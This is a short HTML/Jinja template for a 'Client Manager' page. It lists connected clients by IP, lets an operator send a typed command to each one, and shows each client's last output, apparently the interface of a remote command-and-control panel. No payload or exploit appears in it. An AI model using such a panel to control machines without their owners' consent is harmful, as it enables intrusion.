<!doctype html>
<html>
<head>
  <title>Client Manager</title>
</head>
<body>
  <h1>Connected Clients</h1>
  <ul>
    {% for client_id, client in clients.items() %}
    <li>
      <strong>{{ client.ip }}</strong> ({{ client_id }})
      <form action="/send/{{ client_id }}" method="post" style="display:inline;">
        <input name="cmd" placeholder="Command">
        <button type="submit">Send</button>
      </form>
      <br><strong>Last Output:</strong>
      <pre>{{ client.output }}</pre>
    </li>
    <hr>
    {% endfor %}
  </ul>
</body>
</html>
